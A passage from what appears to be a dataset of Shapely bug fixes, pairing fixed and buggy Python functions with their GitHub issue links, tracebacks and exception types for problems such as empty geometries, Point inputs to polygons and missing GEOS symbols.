File "/Users/dwayne/dev/toolkit/translate/convert/convert.py", line 179, in processfile
fulltemplatepath)
File "/Users/dwayne/dev/toolkit/translate/misc/optrecurse.py", line 568, in processfile
fulloutputpath)
File "/Users/dwayne/dev/toolkit/translate/misc/optrecurse.py", line 535, in finalizetempoutputfile
outputfile.reset()
AttributeError: '_io.BytesIO' object has no attribute 'reset'
|
AttributeError
|
def __init__(self, coordinates=None):
"""
Parameters
----------
coordinates : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples.
Also can be a sequence of Point objects.
Rings are implicitly closed. There is no need to specific a final
coordinate pair identical to the first.
Example
-------
Construct a square ring.
>>> ring = LinearRing( ((0, 0), (0, 1), (1 ,1 ), (1 , 0)) )
>>> ring.is_closed
True
>>> ring.length
4.0
"""
BaseGeometry.__init__(self)
if coordinates is not None:
self._set_coords(coordinates)
|
def __init__(self, coordinates=None):
"""
Parameters
----------
coordinates : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples
Rings are implicitly closed. There is no need to specific a final
coordinate pair identical to the first.
Example
-------
Construct a square ring.
>>> ring = LinearRing( ((0, 0), (0, 1), (1 ,1 ), (1 , 0)) )
>>> ring.is_closed
True
>>> ring.length
4.0
"""
BaseGeometry.__init__(self)
if coordinates is not None:
self._set_coords(coordinates)
|
https://github.com/Toblerity/Shapely/issues/706
|
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
AttributeError: 'list' object has no attribute '__array_interface__'
During handling of the above exception, another exception occurred:
TypeError Traceback (most recent call last)
<ipython-input-35-4b345c8069dd> in <module>()
----> 1 print(Polygon(points_list))
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in __init__(self, shell, holes)
238
239 if shell is not None:
--> 240 ret = geos_polygon_from_py(shell, holes)
241 if ret is not None:
242 self._geom, self._ndim = ret
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in geos_polygon_from_py(shell, holes)
492
493 if shell is not None:
--> 494 ret = geos_linearring_from_py(shell)
495 if ret is None:
496 return None
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
TypeError: object of type 'Point' has no len()
|
AttributeError
|
def __init__(self, shell=None, holes=None):
"""
Parameters
----------
shell : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples.
Also can be a sequence of Point objects.
holes : sequence
A sequence of objects which satisfy the same requirements as the
shell parameters above
Example
-------
Create a square polygon with no holes
>>> coords = ((0., 0.), (0., 1.), (1., 1.), (1., 0.), (0., 0.))
>>> polygon = Polygon(coords)
>>> polygon.area
1.0
"""
BaseGeometry.__init__(self)
if shell is not None:
ret = geos_polygon_from_py(shell, holes)
if ret is not None:
self._geom, self._ndim = ret
else:
self.empty()
|
def __init__(self, shell=None, holes=None):
"""
Parameters
----------
shell : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples
holes : sequence
A sequence of objects which satisfy the same requirements as the
shell parameters above
Example
-------
Create a square polygon with no holes
>>> coords = ((0., 0.), (0., 1.), (1., 1.), (1., 0.), (0., 0.))
>>> polygon = Polygon(coords)
>>> polygon.area
1.0
"""
BaseGeometry.__init__(self)
if shell is not None:
ret = geos_polygon_from_py(shell, holes)
if ret is not None:
self._geom, self._ndim = ret
else:
self.empty()
|
https://github.com/Toblerity/Shapely/issues/706
|
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
AttributeError: 'list' object has no attribute '__array_interface__'
During handling of the above exception, another exception occurred:
TypeError Traceback (most recent call last)
<ipython-input-35-4b345c8069dd> in <module>()
----> 1 print(Polygon(points_list))
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in __init__(self, shell, holes)
238
239 if shell is not None:
--> 240 ret = geos_polygon_from_py(shell, holes)
241 if ret is not None:
242 self._geom, self._ndim = ret
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in geos_polygon_from_py(shell, holes)
492
493 if shell is not None:
--> 494 ret = geos_linearring_from_py(shell)
495 if ret is None:
496 return None
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
TypeError: object of type 'Point' has no len()
|
AttributeError
|
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
# If a LinearRing is passed in, clone it and return
# If a LineString is passed in, clone the coord seq and return a
# LinearRing.
#
# NB: access to coordinates using the array protocol has been moved
# entirely to the speedups module.
if isinstance(ob, LineString):
if type(ob) == LinearRing:
return geos_geom_from_py(ob)
elif ob.is_closed and len(ob.coords) >= 4:
return geos_geom_from_py(ob, lgeos.GEOSGeom_createLinearRing)
else:
ob = list(ob.coords)
try:
m = len(ob)
except TypeError: # Iterators, e.g. Python 3 zip
ob = list(ob)
m = len(ob)
if m == 0:
return None
def _coords(o):
if isinstance(o, Point):
return o.coords[0]
else:
return o
n = len(_coords(ob[0]))
if m < 3:
raise ValueError("A LinearRing must have at least 3 coordinate tuples")
assert n == 2 or n == 3
# Add closing coordinates if not provided
if (
m == 3
or _coords(ob[0])[0] != _coords(ob[-1])[0]
or _coords(ob[0])[1] != _coords(ob[-1])[1]
):
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
if n != update_ndim:
raise ValueError(
"Coordinate dimensions mismatch: target geom has {} dims, "
"update geom has {} dims".format(n, update_ndim)
)
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in range(m):
coords = _coords(ob[i])
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
# Add closing coordinates to sequence?
if M > m:
coords = _coords(ob[0])
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M - 1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M - 1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M - 1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
|
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
# If a LinearRing is passed in, clone it and return
# If a LineString is passed in, clone the coord seq and return a
# LinearRing.
#
# NB: access to coordinates using the array protocol has been moved
# entirely to the speedups module.
if isinstance(ob, LineString):
if type(ob) == LinearRing:
return geos_geom_from_py(ob)
elif ob.is_closed and len(ob.coords) >= 4:
return geos_geom_from_py(ob, lgeos.GEOSGeom_createLinearRing)
else:
ob = list(ob.coords)
try:
m = len(ob)
except TypeError: # Iterators, e.g. Python 3 zip
ob = list(ob)
m = len(ob)
if m == 0:
return None
n = len(ob[0])
if m < 3:
raise ValueError("A LinearRing must have at least 3 coordinate tuples")
assert n == 2 or n == 3
# Add closing coordinates if not provided
if m == 3 or ob[0][0] != ob[-1][0] or ob[0][1] != ob[-1][1]:
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
if n != update_ndim:
raise ValueError(
"Coordinate dimensions mismatch: target geom has {} dims, "
"update geom has {} dims".format(n, update_ndim)
)
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in range(m):
coords = ob[i]
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
# Add closing coordinates to sequence?
if M > m:
coords = ob[0]
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M - 1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M - 1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M - 1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
|
https://github.com/Toblerity/Shapely/issues/706
|
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
AttributeError: 'list' object has no attribute '__array_interface__'
During handling of the above exception, another exception occurred:
TypeError Traceback (most recent call last)
<ipython-input-35-4b345c8069dd> in <module>()
----> 1 print(Polygon(points_list))
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in __init__(self, shell, holes)
238
239 if shell is not None:
--> 240 ret = geos_polygon_from_py(shell, holes)
241 if ret is not None:
242 self._geom, self._ndim = ret
~\Miniconda3\lib\site-packages\shapely\geometry\polygon.py in geos_polygon_from_py(shell, holes)
492
493 if shell is not None:
--> 494 ret = geos_linearring_from_py(shell)
495 if ret is None:
496 return None
~\Miniconda3\lib\site-packages\shapely\speedups\_speedups.pyx in shapely.speedups._speedups.geos_linearring_from_py()
TypeError: object of type 'Point' has no len()
|
AttributeError
|
def bounds(self):
"""Returns minimum bounding region (minx, miny, maxx, maxy)"""
try:
xy = self.coords[0]
except IndexError:
return ()
return (xy[0], xy[1], xy[0], xy[1])
|
def bounds(self):
xy = self.coords[0]
return (xy[0], xy[1], xy[0], xy[1])
|
https://github.com/Toblerity/Shapely/issues/716
|
In [51]: Point().bounds
---------------------------------------------------------------------------
IndexError Traceback (most recent call last)
<ipython-input-51-6ed8561bf72c> in <module>
----> 1 Point().bounds
~/miniconda3/envs/dev37/lib/python3.7/site-packages/shapely/geometry/point.py in bounds(self)
120 @property
121 def bounds(self):
--> 122 xy = self.coords[0]
123 return (xy[0], xy[1], xy[0], xy[1])
124
IndexError: list index out of range
|
IndexError
|
def _split_line_with_point(line, splitter):
"""Split a LineString with a Point"""
assert isinstance(line, LineString)
assert isinstance(splitter, Point)
# check if point is in the interior of the line
if not line.relate_pattern(splitter, "0********"):
# point not on line interior --> return collection with single identity line
# (REASONING: Returning a list with the input line reference and creating a
# GeometryCollection at the general split function prevents unnecessary copying
# of linestrings in multipoint splitting function)
return [line]
elif line.coords[0] == splitter.coords[0]:
# if line is a closed ring the previous test doesn't behave as desired
return [line]
# point is on line, get the distance from the first point on line
distance_on_line = line.project(splitter)
coords = list(line.coords)
# split the line at the point and create two new lines
current_position = 0.0
for i in range(len(coords) - 1):
point1 = coords[i]
point2 = coords[i + 1]
dx = point1[0] - point2[0]
dy = point1[1] - point2[1]
segment_length = (dx**2 + dy**2) ** 0.5
current_position += segment_length
if distance_on_line == current_position:
# splitter is exactly on a vertex
return [LineString(coords[: i + 2]), LineString(coords[i + 1 :])]
elif distance_on_line < current_position:
# splitter is between two vertices
return [
LineString(coords[: i + 1] + [splitter.coords[0]]),
LineString([splitter.coords[0]] + coords[i + 1 :]),
]
return [line]
|
def _split_line_with_point(line, splitter):
"""Split a LineString with a Point"""
assert isinstance(line, LineString)
assert isinstance(splitter, Point)
# check if point is in the interior of the line
if not line.relate_pattern(splitter, "0********"):
# point not on line interior --> return collection with single identity line
# (REASONING: Returning a list with the input line reference and creating a
# GeometryCollection at the general split function prevents unnecessary copying
# of linestrings in multipoint splitting function)
return [line]
elif line.coords[0] == splitter.coords[0]:
# if line is a closed ring the previous test doesn't behave as desired
return [line]
# point is on line, get the distance from the first point on line
distance_on_line = line.project(splitter)
coords = list(line.coords)
# split the line at the point and create two new lines
# TODO: can optimize this by accumulating the computed point-to-point distances
for i, p in enumerate(coords):
pd = line.project(Point(p))
if pd == distance_on_line:
return [LineString(coords[: i + 1]), LineString(coords[i:])]
elif distance_on_line < pd:
# we must interpolate here because the line might use 3D points
cp = line.interpolate(distance_on_line)
ls1_coords = coords[:i]
ls1_coords.append(cp.coords[0])
ls2_coords = [cp.coords[0]]
ls2_coords.extend(coords[i:])
return [LineString(ls1_coords), LineString(ls2_coords)]
|
https://github.com/Toblerity/Shapely/issues/585
|
Traceback (most recent call last):
File "t_test.py", line 8, in <module>
split(line, multi_point)
File "/home/lihongyuan02/.pyenv/versions/3.6.5/lib/python3.6/site-packages/shapely/ops.py", line 474, in split
return GeometryCollection(split_func(geom, splitter))
File "/home/lihongyuan02/.pyenv/versions/3.6.5/lib/python3.6/site-packages/shapely/ops.py", line 416, in _split_line_with_multipoint
new_chunks.extend(SplitOp._split_line_with_point(chunk, pt))
TypeError: 'NoneType' object is not iterable
|
TypeError
|
def _geom(self):
"""Keeps the GEOS geometry in synch with the context."""
gtag = self.gtag()
if gtag != self._gtag or self._is_empty:
self.empty()
if len(self.context) > 0:
self.__geom__, n = self.factory(self.context)
self._gtag = gtag
return self.__geom__
|
def _geom(self):
"""Keeps the GEOS geometry in synch with the context."""
gtag = self.gtag()
if gtag != self._gtag or self._is_empty:
self.empty()
self.__geom__, n = self.factory(self.context)
self._gtag = gtag
return self.__geom__
|
https://github.com/Toblerity/Shapely/issues/542
|
Python 3.6.2 (default, Aug 7 2017, 17:26:39)
[GCC 4.8.5 20150623 (Red Hat 4.8.5-11)] on linux
Type "help", "copyright", "credits" or "license" for more information.
import shapely
shapely.__version__
'1.6.2.post1'
from shapely import geometry
empty_mp = geometry.MultiPolygon()
empty_mp.is_empty
True
empty_json = geometry.mapping(empty_mp)
print(empty_json)
{'type': 'MultiPolygon', 'coordinates': []}
empty_shape = geometry.shape(empty_json)
empty_shape.is_empty
True
empty_asShape = geometry.asShape(empty_json)
empty_asShape.is_empty
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/opt/python-3.6/lib/python3.6/site-packages/shapely/geometry/base.py", line 643, in is_empty
return (self._geom is None) or bool(self.impl['is_empty'](self))
File "/opt/python-3.6/lib/python3.6/site-packages/shapely/geometry/proxy.py", line 33, in _geom
self.__geom__, n = self.factory(self.context)
File "/opt/python-3.6/lib/python3.6/site-packages/shapely/geometry/multipolygon.py", line 136, in geos_multipolygon_from_py
assert L >= 1
AssertionError
|
AssertionError
|
def __geo_interface__(self):
if not self.exterior:
coords = []
else:
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {"type": "Polygon", "coordinates": tuple(coords)}
|
def __geo_interface__(self):
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {"type": "Polygon", "coordinates": tuple(coords)}
|
https://github.com/Toblerity/Shapely/issues/450
|
import shapely
from shapely import wkt
shapely.__version__
'1.5.17'
pg = wkt.loads('POLYGON EMPTY')
pg.wkt
'POLYGON EMPTY'
pg.__geo_interface__
Runtime error
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "C:\Python27\ArcGIS10.5\lib\site-packages\shapely\geometry\polygon.py", line 300, in __geo_interface__
coords = [tuple(self.exterior.coords)]
AttributeError: 'NoneType' object has no attribute 'coords'
|
AttributeError
|
def array_interface(self):
"""Provide the Numpy array protocol."""
if self.is_empty:
ai = {"version": 3, "typestr": "<f8", "shape": (0,), "data": (c_double * 0)()}
else:
ai = self.coords.array_interface()
return ai
|
def array_interface(self):
"""Provide the Numpy array protocol."""
return self.coords.array_interface()
|
https://github.com/Toblerity/Shapely/issues/403
|
Point().__array_interface__
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/Users/snorf/Desktop/Shapely/shapely/geometry/point.py", line 112, in array_interface
ai = self.array_interface_base
File "/Users/snorf/Desktop/Shapely/shapely/geometry/base.py", line 299, in array_interface_base
'data': self.ctypes,
File "/Users/snorf/Desktop/Shapely/shapely/geometry/point.py", line 100, in ctypes
array_type = c_double * self._ndim
TypeError: can't multiply sequence by non-int of type 'NoneType'
|
TypeError
|
def array_interface(self):
"""Provide the Numpy array protocol."""
if self.is_empty:
ai = {"version": 3, "typestr": "<f8", "shape": (0,), "data": (c_double * 0)()}
else:
ai = self.array_interface_base
ai.update({"shape": (self._ndim,)})
return ai
|
def array_interface(self):
"""Provide the Numpy array protocol."""
ai = self.array_interface_base
ai.update({"shape": (self._ndim,)})
return ai
|
https://github.com/Toblerity/Shapely/issues/403
|
Point().__array_interface__
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/Users/snorf/Desktop/Shapely/shapely/geometry/point.py", line 112, in array_interface
ai = self.array_interface_base
File "/Users/snorf/Desktop/Shapely/shapely/geometry/base.py", line 299, in array_interface_base
'data': self.ctypes,
File "/Users/snorf/Desktop/Shapely/shapely/geometry/point.py", line 100, in ctypes
array_type = c_double * self._ndim
TypeError: can't multiply sequence by non-int of type 'NoneType'
|
TypeError
|
def __init__(self, dll):
super(LGEOS300, self).__init__(dll)
self.geos_handle = self._lgeos.initGEOS(notice_h, error_h)
keys = list(self._lgeos.__dict__.keys())
for key in keys:
setattr(self, key, getattr(self._lgeos, key))
self.GEOSFree = self._lgeos.free
# Deprecated
self.GEOSGeomToWKB_buf.errcheck = errcheck_wkb
self.GEOSGeomToWKT.errcheck = errcheck_just_free
self.GEOSRelate.errcheck = errcheck_just_free
for pred in (
self.GEOSDisjoint,
self.GEOSTouches,
self.GEOSIntersects,
self.GEOSCrosses,
self.GEOSWithin,
self.GEOSContains,
self.GEOSOverlaps,
self.GEOSEquals,
self.GEOSEqualsExact,
self.GEOSisEmpty,
self.GEOSisValid,
self.GEOSisSimple,
self.GEOSisRing,
self.GEOSHasZ,
):
pred.errcheck = errcheck_predicate
self.methods["area"] = self.GEOSArea
self.methods["boundary"] = self.GEOSBoundary
self.methods["buffer"] = self.GEOSBuffer
self.methods["centroid"] = self.GEOSGetCentroid
self.methods["representative_point"] = self.GEOSPointOnSurface
self.methods["convex_hull"] = self.GEOSConvexHull
self.methods["distance"] = self.GEOSDistance
self.methods["envelope"] = self.GEOSEnvelope
self.methods["length"] = self.GEOSLength
self.methods["has_z"] = self.GEOSHasZ
self.methods["is_empty"] = self.GEOSisEmpty
self.methods["is_ring"] = self.GEOSisRing
self.methods["is_closed"] = self.GEOSisClosed
self.methods["is_simple"] = self.GEOSisSimple
self.methods["is_valid"] = self.GEOSisValid
self.methods["disjoint"] = self.GEOSDisjoint
self.methods["touches"] = self.GEOSTouches
self.methods["intersects"] = self.GEOSIntersects
self.methods["crosses"] = self.GEOSCrosses
self.methods["within"] = self.GEOSWithin
self.methods["contains"] = self.GEOSContains
self.methods["overlaps"] = self.GEOSOverlaps
self.methods["equals"] = self.GEOSEquals
self.methods["equals_exact"] = self.GEOSEqualsExact
self.methods["relate"] = self.GEOSRelate
self.methods["difference"] = self.GEOSDifference
self.methods["symmetric_difference"] = self.GEOSSymDifference
self.methods["union"] = self.GEOSUnion
self.methods["intersection"] = self.GEOSIntersection
self.methods["simplify"] = self.GEOSSimplify
self.methods["topology_preserve_simplify"] = self.GEOSTopologyPreserveSimplify
|
def __init__(self, dll):
super(LGEOS300, self).__init__(dll)
self.geos_handle = self._lgeos.initGEOS(notice_h, error_h)
keys = list(self._lgeos.__dict__.keys())
for key in keys:
setattr(self, key, getattr(self._lgeos, key))
self.GEOSFree = self._lgeos.free
# Deprecated
self.GEOSGeomToWKB_buf.errcheck = errcheck_wkb
self.GEOSGeomToWKT.errcheck = errcheck_just_free
self.GEOSRelate.errcheck = errcheck_just_free
for pred in (
self.GEOSDisjoint,
self.GEOSTouches,
self.GEOSIntersects,
self.GEOSCrosses,
self.GEOSWithin,
self.GEOSContains,
self.GEOSOverlaps,
self.GEOSEquals,
self.GEOSEqualsExact,
self.GEOSisEmpty,
self.GEOSisValid,
self.GEOSisSimple,
self.GEOSisRing,
self.GEOSisClosed,
self.GEOSHasZ,
):
pred.errcheck = errcheck_predicate
self.methods["area"] = self.GEOSArea
self.methods["boundary"] = self.GEOSBoundary
self.methods["buffer"] = self.GEOSBuffer
self.methods["centroid"] = self.GEOSGetCentroid
self.methods["representative_point"] = self.GEOSPointOnSurface
self.methods["convex_hull"] = self.GEOSConvexHull
self.methods["distance"] = self.GEOSDistance
self.methods["envelope"] = self.GEOSEnvelope
self.methods["length"] = self.GEOSLength
self.methods["has_z"] = self.GEOSHasZ
self.methods["is_empty"] = self.GEOSisEmpty
self.methods["is_ring"] = self.GEOSisRing
self.methods["is_closed"] = self.GEOSisClosed
self.methods["is_simple"] = self.GEOSisSimple
self.methods["is_valid"] = self.GEOSisValid
self.methods["disjoint"] = self.GEOSDisjoint
self.methods["touches"] = self.GEOSTouches
self.methods["intersects"] = self.GEOSIntersects
self.methods["crosses"] = self.GEOSCrosses
self.methods["within"] = self.GEOSWithin
self.methods["contains"] = self.GEOSContains
self.methods["overlaps"] = self.GEOSOverlaps
self.methods["equals"] = self.GEOSEquals
self.methods["equals_exact"] = self.GEOSEqualsExact
self.methods["relate"] = self.GEOSRelate
self.methods["difference"] = self.GEOSDifference
self.methods["symmetric_difference"] = self.GEOSSymDifference
self.methods["union"] = self.GEOSUnion
self.methods["intersection"] = self.GEOSIntersection
self.methods["simplify"] = self.GEOSSimplify
self.methods["topology_preserve_simplify"] = self.GEOSTopologyPreserveSimplify
|
https://github.com/Toblerity/Shapely/issues/176
|
$ python -c "import shapely.geos"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/geos.py", line 133, in <module>
prototype(_lgeos, geos_version)
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/ctypes_declarations.py", line 279, in prototype
lgeos.GEOSisClosed.restype = c_byte
File "/usr/lib/python2.7/ctypes/__init__.py", line 378, in __getattr__
func = self.__getitem__(name)
File "/usr/lib/python2.7/ctypes/__init__.py", line 383, in __getitem__
func = self._FuncPtr((name_or_ordinal, self))
AttributeError: /usr/lib/libgeos_c.so.1: undefined symbol: GEOSisClosed
|
AttributeError
|
def __init__(self, dll):
super(LGEOS310, self).__init__(dll)
self.geos_handle = self._lgeos.initGEOS_r(notice_h, error_h)
keys = list(self._lgeos.__dict__.keys())
for key in [x for x in keys if not x.endswith("_r")]:
if key + "_r" in keys:
reentr_func = getattr(self._lgeos, key + "_r")
attr = ftools.partial(reentr_func, self.geos_handle)
attr.__name__ = reentr_func.__name__
setattr(self, key, attr)
else:
setattr(self, key, getattr(self._lgeos, key))
if not hasattr(self, "GEOSFree"):
# GEOS < 3.1.1
self.GEOSFree = self._lgeos.free
# Deprecated
self.GEOSGeomToWKB_buf.func.errcheck = errcheck_wkb
self.GEOSGeomToWKT.func.errcheck = errcheck_just_free
self.GEOSRelate.func.errcheck = errcheck_just_free
for pred in (
self.GEOSDisjoint,
self.GEOSTouches,
self.GEOSIntersects,
self.GEOSCrosses,
self.GEOSWithin,
self.GEOSContains,
self.GEOSOverlaps,
self.GEOSEquals,
self.GEOSEqualsExact,
self.GEOSisEmpty,
self.GEOSisValid,
self.GEOSisSimple,
self.GEOSisRing,
self.GEOSisClosed,
self.GEOSHasZ,
):
pred.func.errcheck = errcheck_predicate
self.GEOSisValidReason.func.errcheck = errcheck_just_free
self.methods["area"] = self.GEOSArea
self.methods["boundary"] = self.GEOSBoundary
self.methods["buffer"] = self.GEOSBuffer
self.methods["centroid"] = self.GEOSGetCentroid
self.methods["representative_point"] = self.GEOSPointOnSurface
self.methods["convex_hull"] = self.GEOSConvexHull
self.methods["distance"] = self.GEOSDistance
self.methods["envelope"] = self.GEOSEnvelope
self.methods["length"] = self.GEOSLength
self.methods["has_z"] = self.GEOSHasZ
self.methods["is_empty"] = self.GEOSisEmpty
self.methods["is_ring"] = self.GEOSisRing
self.methods["is_simple"] = self.GEOSisSimple
self.methods["is_valid"] = self.GEOSisValid
self.methods["disjoint"] = self.GEOSDisjoint
self.methods["touches"] = self.GEOSTouches
self.methods["intersects"] = self.GEOSIntersects
self.methods["crosses"] = self.GEOSCrosses
self.methods["within"] = self.GEOSWithin
self.methods["contains"] = self.GEOSContains
self.methods["overlaps"] = self.GEOSOverlaps
self.methods["equals"] = self.GEOSEquals
self.methods["equals_exact"] = self.GEOSEqualsExact
self.methods["relate"] = self.GEOSRelate
self.methods["difference"] = self.GEOSDifference
self.methods["symmetric_difference"] = self.GEOSSymDifference
self.methods["union"] = self.GEOSUnion
self.methods["intersection"] = self.GEOSIntersection
self.methods["prepared_intersects"] = self.GEOSPreparedIntersects
self.methods["prepared_contains"] = self.GEOSPreparedContains
self.methods["prepared_contains_properly"] = self.GEOSPreparedContainsProperly
self.methods["prepared_covers"] = self.GEOSPreparedCovers
self.methods["simplify"] = self.GEOSSimplify
self.methods["topology_preserve_simplify"] = self.GEOSTopologyPreserveSimplify
self.methods["cascaded_union"] = self.GEOSUnionCascaded
|
def __init__(self, dll):
super(LGEOS310, self).__init__(dll)
self.geos_handle = self._lgeos.initGEOS_r(notice_h, error_h)
keys = list(self._lgeos.__dict__.keys())
for key in [x for x in keys if not x.endswith("_r")]:
if key + "_r" in keys:
reentr_func = getattr(self._lgeos, key + "_r")
attr = ftools.partial(reentr_func, self.geos_handle)
attr.__name__ = reentr_func.__name__
setattr(self, key, attr)
else:
setattr(self, key, getattr(self._lgeos, key))
if not hasattr(self, "GEOSFree"):
# GEOS < 3.1.1
self.GEOSFree = self._lgeos.free
# Deprecated
self.GEOSGeomToWKB_buf.func.errcheck = errcheck_wkb
self.GEOSGeomToWKT.func.errcheck = errcheck_just_free
self.GEOSRelate.func.errcheck = errcheck_just_free
for pred in (
self.GEOSDisjoint,
self.GEOSTouches,
self.GEOSIntersects,
self.GEOSCrosses,
self.GEOSWithin,
self.GEOSContains,
self.GEOSOverlaps,
self.GEOSEquals,
self.GEOSEqualsExact,
self.GEOSisEmpty,
self.GEOSisValid,
self.GEOSisSimple,
self.GEOSisRing,
self.GEOSisClosed,
self.GEOSHasZ,
):
pred.func.errcheck = errcheck_predicate
self.GEOSisValidReason.func.errcheck = errcheck_just_free
self.methods["area"] = self.GEOSArea
self.methods["boundary"] = self.GEOSBoundary
self.methods["buffer"] = self.GEOSBuffer
self.methods["centroid"] = self.GEOSGetCentroid
self.methods["representative_point"] = self.GEOSPointOnSurface
self.methods["convex_hull"] = self.GEOSConvexHull
self.methods["distance"] = self.GEOSDistance
self.methods["envelope"] = self.GEOSEnvelope
self.methods["length"] = self.GEOSLength
self.methods["has_z"] = self.GEOSHasZ
self.methods["is_empty"] = self.GEOSisEmpty
self.methods["is_ring"] = self.GEOSisRing
self.methods["is_closed"] = self.GEOSisClosed
self.methods["is_simple"] = self.GEOSisSimple
self.methods["is_valid"] = self.GEOSisValid
self.methods["disjoint"] = self.GEOSDisjoint
self.methods["touches"] = self.GEOSTouches
self.methods["intersects"] = self.GEOSIntersects
self.methods["crosses"] = self.GEOSCrosses
self.methods["within"] = self.GEOSWithin
self.methods["contains"] = self.GEOSContains
self.methods["overlaps"] = self.GEOSOverlaps
self.methods["equals"] = self.GEOSEquals
self.methods["equals_exact"] = self.GEOSEqualsExact
self.methods["relate"] = self.GEOSRelate
self.methods["difference"] = self.GEOSDifference
self.methods["symmetric_difference"] = self.GEOSSymDifference
self.methods["union"] = self.GEOSUnion
self.methods["intersection"] = self.GEOSIntersection
self.methods["prepared_intersects"] = self.GEOSPreparedIntersects
self.methods["prepared_contains"] = self.GEOSPreparedContains
self.methods["prepared_contains_properly"] = self.GEOSPreparedContainsProperly
self.methods["prepared_covers"] = self.GEOSPreparedCovers
self.methods["simplify"] = self.GEOSSimplify
self.methods["topology_preserve_simplify"] = self.GEOSTopologyPreserveSimplify
self.methods["cascaded_union"] = self.GEOSUnionCascaded
|
https://github.com/Toblerity/Shapely/issues/176
|
$ python -c "import shapely.geos"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/geos.py", line 133, in <module>
prototype(_lgeos, geos_version)
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/ctypes_declarations.py", line 279, in prototype
lgeos.GEOSisClosed.restype = c_byte
File "/usr/lib/python2.7/ctypes/__init__.py", line 378, in __getattr__
func = self.__getitem__(name)
File "/usr/lib/python2.7/ctypes/__init__.py", line 383, in __getitem__
func = self._FuncPtr((name_or_ordinal, self))
AttributeError: /usr/lib/libgeos_c.so.1: undefined symbol: GEOSisClosed
|
AttributeError
|
def __init__(self, dll):
super(LGEOS330, self).__init__(dll)
# GEOS 3.3.8 from homebrew has, but doesn't advertise
# GEOSPolygonize_full. We patch it in explicitly here.
key = "GEOSPolygonize_full"
func = getattr(self._lgeos, key + "_r")
attr = ftools.partial(func, self.geos_handle)
attr.__name__ = func.__name__
setattr(self, key, attr)
for pred in (self.GEOSisClosed,):
pred.func.errcheck = errcheck_predicate
self.methods["unary_union"] = self.GEOSUnaryUnion
self.methods["is_closed"] = self.GEOSisClosed
self.methods["cascaded_union"] = self.methods["unary_union"]
|
def __init__(self, dll):
super(LGEOS330, self).__init__(dll)
# GEOS 3.3.8 from homebrew has, but doesn't advertise
# GEOSPolygonize_full. We patch it in explicitly here.
key = "GEOSPolygonize_full"
func = getattr(self._lgeos, key + "_r")
attr = ftools.partial(func, self.geos_handle)
attr.__name__ = func.__name__
setattr(self, key, attr)
self.methods["unary_union"] = self.GEOSUnaryUnion
self.methods["cascaded_union"] = self.methods["unary_union"]
|
https://github.com/Toblerity/Shapely/issues/176
|
$ python -c "import shapely.geos"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/geos.py", line 133, in <module>
prototype(_lgeos, geos_version)
